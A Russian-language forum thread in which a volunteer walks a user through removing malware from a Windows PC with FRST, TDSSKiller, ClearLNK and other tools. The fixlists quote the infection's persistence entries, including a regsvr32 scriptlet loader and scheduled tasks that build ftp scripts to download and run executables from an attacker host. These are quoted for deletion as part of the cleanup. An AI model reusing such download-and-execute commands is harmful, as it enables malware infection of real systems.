Устал пробовать удалить трояны, что делать?

[mike 1 1 093]

Я отвечаю когда у меня есть свободное время и обычно после основной работы. Пожалуйста, наберитесь терпения и подождите.

 

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!

 

• Временно выгрузите антивирус, файрволл и прочее защитное ПО.

• Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:

CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp0930.host:280/v.sct scrobj.dll
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{223d6bfe-bd0e-4da1-9128-a6c57942e271} <==== ATTENTION (Restriction - IP)
C:\Users\TES_EidEnuard\AppData\Local\iYmPYkeVYOOIF.exe
2018-12-02 09:01 - 2018-12-02 09:01 - 000000081 _____ C:\Windows\system32\s
2018-12-02 09:01 - 2018-12-02 09:01 - 000000079 _____ C:\Windows\system32\ps
2018-12-02 09:01 - 2018-12-02 09:01 - 000000077 _____ C:\Windows\system32\p
2018-12-02 08:50 - 2018-12-02 09:06 - 000003186 _____ C:\Windows\System32\Tasks\ok
2018-12-02 08:50 - 2018-12-02 09:05 - 000003506 _____ C:\Windows\System32\Tasks\Mysa3
2018-12-02 08:49 - 2018-12-02 09:05 - 000003520 _____ C:\Windows\System32\Tasks\Mysa
2018-12-02 08:49 - 2018-12-02 09:05 - 000003426 _____ C:\Windows\System32\Tasks\Mysa2
2018-12-02 08:49 - 2018-12-02 09:05 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
2018-12-02 08:49 - 2018-12-02 08:49 - 015038553 _____ C:\Windows\SysWOW64\Drivers\64.exe
2018-12-02 08:27 - 2018-12-02 09:05 - 000000084 _____ C:\Program Files\Common Files\xp.dat
2018-12-02 08:26 - 2018-12-02 09:03 - 000000084 _____ C:\Program Files\Common Files\xpdown.dat
Task: {227FBB57-78B1-4869-B861-ED46D4D66686} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {25883FC8-B6F7-46DD-ABC7-405B7B2855A9} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp0930.host>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {9EA65489-F2E2-43A5-91B0-45BBDC7B8BEB} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {BA583DF3-86E7-4FDE-AB25-C8CC81300242} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
Task: {DC85F829-099C-4A65-8A7A-774D77C4ABA7} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
EmptyTemp:

• Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!

• Обратите внимание, что компьютер будет перезагружен.

• Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму

 

 

Сделайте лог TDSSKiller, но утилиту скачайте отсюда https://box.kaspersky.com/d/6b26590a307e4ae78fe7/ . Самостоятельно ничего не удаляйте!

[Enuard 0]

Файл фикслога. 

Скачал ТДСкиллер, но так и не понял. как в нём делать лог? 

Fixlog.txt

[mike 1 1 093]

 

 

Запустите файл TDSSKiller.exe.

• Нажмите кнопку "Начать проверку". Не меняйте настройки сканирования по умолчанию.

• В процессе проверки могут быть обнаружены объекты двух типов:

• вредоносные (точно было установлено, какой вредоносной программой поражен объект);

• подозрительные (тип вредоносного воздействия точно установить невозможно).

• По окончании проверки утилита выводит список обнаруженных объектов с их подробным описанием.

• Для вредоносных объектов утилита автоматически определяет действие: Лечить или Удалить.

• Для подозрительных объектов утилита предоставляет выбор действия пользователю (по умолчанию Пропустить).

• Самостоятельно без указания консультанта ничего не удаляйте!!!

• После нажатия кнопки Продолжить утилита выполняет выбранные действия и выводит результат.

• Прикрепите лог утилиты к своему следующему сообщению
• По умолчанию утилита выводит отчет работы в корень системного диска (диска, на котором установлена операционная система, как правило, это диск С:\).

Имя отчета имеет следующий вид: ИмяУтилиты.Версия_Дата_Время_log.txt

Например, C:\TDSSKiller.2.4.7_23.07.2010_15.31.43_log.txt

 

 

[Enuard 0]

Получается, этот лог? 

TDSSKiller.3.1.0.20_03.12.2018_21.50.07_log.txt

[mike 1 1 093]

 

21:51:02.0921 0x0460  Detected object count: 2

21:51:02.0921 0x0460  Actual detected object count: 2

21:51:35.0864 0x0460  System memory - cured

21:51:35.0864 0x0460  System memory ( MEM:Rootkit.Win64.DarkGalaxy.a ) - User select action: Cure 

21:51:36.0306 0x0460  \Device\Harddisk0\DR0\# - copied to quarantine

21:51:36.0307 0x0460  \Device\Harddisk0\DR0 - copied to quarantine

21:51:36.0333 0x0460  \Device\Harddisk0\DR0 ( Rootkit.Boot.DarkGalaxy.a ) - will be cured on reboot

21:51:36.0341 0x0460  \Device\Harddisk0\DR0 - ok

21:51:36.0341 0x0460  \Device\Harddisk0\DR0 ( Rootkit.Boot.DarkGalaxy.a ) - User select action: Cure 

21:51:36.0416 0x0460  KLMD registered as C:\Windows\system32\drivers\81240689.sys

21:54:17.0546 0x084c  Deinitialize success

 

Этот, но какие-то действия к найденным зверькам я не просил применять, ну да ладно, основного зверька вывели. 

 

Новые логи FRST.txt, Addition.txt сделайте. 

[Enuard 0]

Да я и не хотел удалять, как то на автомате нажал "продолжить", а потом только вспомнил. что данное действие запускает скрипт на выбор решения. 
Логи прикрепляю. 

Addition.txt

FRST.txt

[mike 1 1 093]

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!

 

 

Временно выгрузите антивирус и прочее защитное ПО.

• Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:

CreateRestorePoint:
CloseProcesses:
S3 Winmon; \??\C:\Windows\System32\drivers\Winmon.sys [X]
S3 WinmonFS; \??\C:\Windows\System32\drivers\WinmonFS.sys [X]
S1 WinmonProcessMonitor; \??\C:\Windows\System32\drivers\WinmonProcessMonitor.sys [X]
2018-11-24 11:36 - 2018-11-24 11:41 - 000000000 ____D C:\Program Files\Common Files\HIYOKC07A
2018-10-16 23:57 - 2018-10-16 23:57 - 000002497 _____ C:\Windows\cpu.txt
2018-10-16 19:55 - 2018-12-03 19:55 - 000027136 _____ (Microsoft Corporation) C:\Windows\system\down.exe

• Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!

• Обратите внимание, что компьютер будет перезагружен.

• Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму

 

 

Скачайте Check Browsers' LNK и сохраните архив с утилитой на Рабочем столе

• Распакуйте архив с утилитой в отдельную папку

• Запустите Check Browsers LNK.exe

  Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите Да

• После окончания работы программы в папке Log будет сохранен отчет Check_Browsers_LNK.log

• Прикрепите этот отчет в вашей теме.

 

 

[Enuard 0]

Прикрепляю

Check_Browsers_LNK.log

Fixlog.txt

Изменено 4 декабря, 2018 пользователем Enuard

[mike 1 1 093]

 

• Скачайте ClearLNK и сохраните архив с утилитой на рабочем столе.

• Распакуйте архив с утилитой в отдельную папку.

• Запустите ClearLnk и скопируйте в окно программы следующий текст:

 

C:\Users\TES_EidEnuard\Desktop\Новая папка (8)\Gооglе Сhrоmе.lnk
C:\Users\TES_EidEnuard\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Оpеrа.lnk
C:\Users\TES_EidEnuard\Desktop\Новая папка (8)\Drаgоn Аgе Inquisitiоn.lnk

 

• Нажмите на кнопку "Лечить" и дождитесь окончания работы программы.

• Отчет о работе ClearLNK-<Дата>.log будет сохранен в папке LOG.

• Прикрепите этот отчет к своему следующему сообщению.

 

 

[Enuard 0]

прикрепляю

ClearLNK-2018.12.04_23.05.50.log

[mike 1 1 093]

Думаю можно выписывать больного. 

[Enuard 0]

Спасибо большое, если найду что либо ещё - могу обращаться? 

[mike 1 1 093]

Можете.

 

• Для профилактики и защиты от повторных заражений загрузите SecurityCheck by glax24 отсюда и сохраните утилиту на Рабочем столе
• Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7)
• Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу.
• Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
• Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
• Прикрепите отчет в вашей теме

 

[Enuard 0]

прикрепил

SecurityCheck.txt

[mike 1 1 093]

Обновите:

 

Internet Explorer 8.0.7601.17514 Внимание! Скачать обновления

^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^

 

Автоматическое обновление отключено - включите

Foxit Reader  6.1.1.1025 v.v 6.1.1.1025 Внимание! Скачать обновления

^Локализованные версии могут обновляться позже англоязычных!^

7-Zip 9.30 (x64 edition) v.9.30.00.0 Внимание! Скачать обновления

^Удалите старую версию, скачайте и установите новую.^

NVIDIA GeForce Experience 3.5.0.70 v.3.5.0.70 Внимание! Скачать обновления

--------------------------------- [ IM ] ----------------------------------

Skype™ 7.40 v.7.40.104 Внимание! Скачать обновления

-------------------------------- [ Java ] ---------------------------------

Java 8 Update 71 v.8.0.710.15 Внимание! Скачать обновления

^Удалите старую версию и установите новую (jre-8u192-windows-i586.exe)^

--------------------------- [ AdobeProduction ] ---------------------------

Adobe Flash Player 11 ActiveX & Plugin 64-bit v.11.9.900.152 Внимание! Скачать обновления

^Удалите старую версию и установите новые Flash Player ActiveX и Flash Player Plugin^

Adobe Shockwave Player + Authorware Web Player v.v12.0.6.147 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее, скачать и установить Adobe Shockwave Player.

------------------------------- [ Browser ] -------------------------------

Yandex v.16.7.0.3342 Внимание! Скачать обновления

^Проверьте обновления через меню Дополнительно - О браузере Yandex!^

 

 

Далее создайте точку восстановления.

 

• Для удаления утилит, которые использовались в лечении скачайте DelFix и сохраните утилиту на Рабочем столе

• Запустите DelFix

  Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите Да

• В открывшемся окне программы поставьте галочки напротив пунктов Remove desinfection tools и Create registry backup

• Нажмите на кнопку Run

• Прикрепите отчет delfix.txt